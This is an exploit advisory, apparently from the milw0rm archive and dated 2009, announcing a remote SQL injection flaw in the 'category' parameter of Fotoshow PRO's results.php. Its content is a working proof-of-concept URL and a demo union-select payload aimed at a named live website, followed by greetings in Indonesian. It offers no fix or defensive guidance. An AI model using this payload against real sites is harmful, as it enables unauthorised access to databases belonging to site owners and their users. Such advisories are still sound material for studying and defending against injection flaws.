[Â»]====================================================================================================================[_][-][X]
[Â»]                                                                             					     [Â»]
[Â»]      	                   Fotoshow PROâ„¢ (category) Remote SQL Injection Vulnerability  		             [Â»]
[Â»]              				         							             [Â»]
[Â»]            		 	        =======    ------d-------m------     ====    ====   			             [Â»]
[Â»]             	 	        ||     =        | |(o o)| |          ||   ||   ||   			             [Â»]
[Â»]             		        ||     =          ||(~)||            ||        ||   			             [Â»]
[Â»]             	 	        =======             /|\              ||        ||  			             [Â»]
[Â»]==========================================================================================================================[Â»]
[Â»] 				          Author         : darkmasking		 				             [Â»]
[Â»] 				          Date           : August, 15th 2009           				             [Â»]
[Â»]           		 	          Contact        : darkmasking[at]gmail[dot]com  			             [Â»]
[Â»]				          Critical Level : Dangerous (*RED)		  			             [Â»]
[Â»]--------------------------------------------------------------------------------------------------------------------------[Â»]
[Â»] Affected software description :        					             				     [Â»]
[Â»] Software : Fotoshow PROâ„¢							            				     [Â»]
[Â»] Vendor   : http://www.fotoshowpro.com/					            				     [Â»]
[Â»] Price    : $5,000 (USD) http://www.fotoshowpro.com/features.php \0_o/	             				     [Â»]
[Â»]==========================================================================================================================[Â»]
[Â»]														             [Â»]
[Â»] [~] SQLi POC												             [Â»]
[Â»] 														             [Â»]
[Â»] [+] http://www.target.com/[path]/results.php?category=[SQli]`						             [Â»]
[Â»]														             [Â»]
[Â»]														             [Â»]
[Â»]--------------------------------------------------------------------------------------------------------------------------[Â»]
[Â»]														             [Â»]
[Â»] [~] SQLi POC Demo													     [Â»]
[Â»]															     [Â»]
[Â»] [+] http://www.macduffeverton.com/stock/results.php?category=-9999 and 1=0 union select null,version(),null,null,null--  [Â»]
[Â»]														             [Â»]
[Â»]--------------------------------------------------------------------------------------------------------------------------[Â»]
[Â»]														             [Â»]
[Â»] [~] Greetz													             [Â»]
[Â»]														             [Â»]
[Â»]	Sorry bro belum dapat teman, jadi untuk diri sendiri aja! (SELAMAT MERAYAKAN 17an | Semoga Meriah)	             [Â»]
[Â»]														             [Â»]
[Â»]														             [Â»]
[Â»]==========================================================================================================================[Â»]

# milw0rm.com [2009-08-18]